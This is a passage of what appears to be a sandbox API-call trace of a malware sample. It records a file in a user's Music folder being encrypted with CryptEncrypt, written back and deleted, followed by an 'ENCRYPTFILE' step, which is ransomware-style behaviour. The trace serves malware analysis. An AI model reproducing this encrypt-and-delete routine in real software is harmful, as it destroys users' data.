0x43ca4a8 [0112.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0112.678] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0112.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0112.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0112.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0112.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0112.678] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0112.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797048 [0112.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0112.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0112.678] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0112.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0112.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0112.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0112.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0112.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0112.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0112.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0112.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0112.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0112.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0112.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0112.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0112.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0112.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0112.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0112.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0112.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0112.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0112.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0112.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0112.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0112.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0112.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0112.679] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0112.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0112.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0112.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0112.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0112.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0112.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0112.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0112.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0112.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0112.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0112.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0112.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391930 [0112.680] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0112.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391930 | out: hHeap=0x1780000) returned 1 [0112.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0112.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca958 [0112.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0112.680] PeekMessageW (in: lpMsg=0x144dfec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144dfec) returned 0 [0112.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0112.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0112.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0112.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0112.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0112.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0112.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0112.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0112.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0112.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0112.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0112.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0112.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0112.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0112.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0112.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0112.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0112.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0112.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0112.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0112.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0112.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0112.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0112.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0112.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0112.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0112.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0112.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0112.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0112.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0112.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0112.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0112.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0112.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0112.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0112.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0112.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0112.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fc8 [0112.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0112.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0112.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0112.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0112.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0112.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0112.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0112.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0112.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0112.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0112.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0112.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0112.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0112.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ee8 [0112.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b48 [0112.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0112.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0112.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0112.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0112.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b48 | out: hHeap=0x1780000) returned 1 [0112.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0112.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0112.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0112.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0112.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0112.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0112.682] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0112.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0112.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0112.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0112.682] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0112.684] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796ec8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0112.684] CryptGetKeyParam (in: hKey=0x41ac2c0, dwParam=0x7, pbData=0x43e2800, pdwDataLen=0x144e008, dwFlags=0x0 | out: pbData=0x43e2800*=0x6610, pdwDataLen=0x144e008*=0x4) returned 1 [0112.684] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0112.684] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0112.684] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0112.684] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0112.685] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0112.685] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0112.685] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca7c0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0112.685] CryptEncrypt (in: hKey=0x41ac2c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e538*=0x16fbe, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e538*=0x16fc0) returned 1 [0112.685] CharLowerBuffW (in: lpsz="byte[94145]", cchLength=0xb | out: lpsz="byte[94145]") returned 0xb [0112.687] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0112.687] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0112.687] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0112.687] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cabe0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0112.687] CryptEncrypt (in: hKey=0x41ac2c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x49b0fd0*, pdwDataLen=0x144e538*=0x16fbe, dwBufLen=0x16fc0 | out: pbData=0x49b0fd0*, pdwDataLen=0x144e538*=0x16fc0) returned 1 [0112.748] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0112.748] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0112.748] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0112.749] WriteFile (in: hFile=0x298, lpBuffer=0x4516010*, nNumberOfBytesToWrite=0x16fc0, lpNumberOfBytesWritten=0x144ef3c, lpOverlapped=0x0 | out: lpBuffer=0x4516010*, lpNumberOfBytesWritten=0x144ef3c*=0x16fc0, lpOverlapped=0x0) returned 1 [0112.751] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0112.752] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0112.752] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0112.752] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0112.752] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca7f0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0112.752] CryptDestroyKey (hKey=0x41ac2c0) returned 1 [0112.752] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0112.752] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0112.752] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0112.752] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0112.752] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0112.752] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0112.752] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0112.752] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0112.752] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0112.752] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0112.752] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796ee8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0112.752] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0112.752] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0112.752] FreeLibrary (hLibModule=0x756e0000) returned 1 [0112.752] CloseHandle (hObject=0x258) returned 1 [0112.753] CloseHandle (hObject=0x298) returned 1 [0112.760] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\JUnckwz0f9.wav", nBufferLength=0x7fff, lpBuffer=0x143ef38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\JUnckwz0f9.wav", lpFilePart=0x0) returned 0x30 [0112.760] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\JUnckwz0f9.wav" (normalized: "c:\\users\\fd1hvy\\music\\9smmb260b1u\\junckwz0f9.wav")) returned 0x20 [0112.760] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\JUnckwz0f9.wav", lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf1d09060, ftCreationTime.dwHighDateTime=0x1d5e256, ftLastAccessTime.dwLowDateTime=0xfe02eaa0, ftLastAccessTime.dwHighDateTime=0x1d5e18d, ftLastWriteTime.dwLowDateTime=0xfe02eaa0, ftLastWriteTime.dwHighDateTime=0x1d5e18d, nFileSizeHigh=0x0, nFileSizeLow=0x16fbe, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="JUnckwz0f9.wav", cAlternateFileName="JUNCKW~1.WAV")) returned 0x41ac500 [0112.761] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\JUnckwz0f9.wav" (normalized: "c:\\users\\fd1hvy\\music\\9smmb260b1u\\junckwz0f9.wav")) returned 1 [0112.826] FindNextFileW (in: hFindFile=0x41ac500, lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf1d09060, ftCreationTime.dwHighDateTime=0x1d5e256, ftLastAccessTime.dwLowDateTime=0xfe02eaa0, ftLastAccessTime.dwHighDateTime=0x1d5e18d, ftLastWriteTime.dwLowDateTime=0xfe02eaa0, ftLastWriteTime.dwHighDateTime=0x1d5e18d, nFileSizeHigh=0x0, nFileSizeLow=0x16fbe, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="JUnckwz0f9.wav", cAlternateFileName="JUNCKW~1.WAV")) returned 0 [0112.827] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0112.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369fd8 | out: hHeap=0x1780000) returned 1 [0112.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0112.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0a0 | out: hHeap=0x1780000) returned 1 [0112.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0112.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431e568 | out: hHeap=0x1780000) returned 1 [0112.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0112.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fc8 | out: hHeap=0x1780000) returned 1 [0112.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f68 | out: hHeap=0x1780000) returned 1 [0112.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0112.827] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0112.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac600 | out: hHeap=0x1780000) returned 1 [0112.827] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0112.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0112.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ea8 | out: hHeap=0x1780000) returned 1 [0112.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0e8 | out: hHeap=0x1780000) returned 1 [0112.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f50 | out: hHeap=0x1780000) returned 1 [0112.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0112.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0112.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0b8 | out: hHeap=0x1780000) returned 1 [0112.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0112.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0112.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x19d20a8 | out: hHeap=0x1780000) returned 1 [0112.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0112.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca028 | out: hHeap=0x1780000) returned 1 [0112.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca088 | out: hHeap=0x1780000) returned 1 [0112.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0112.828] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0112.828] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0112.828] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23f0 [0112.828] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0112.828] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0112.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0112.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0112.828] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0112.828] 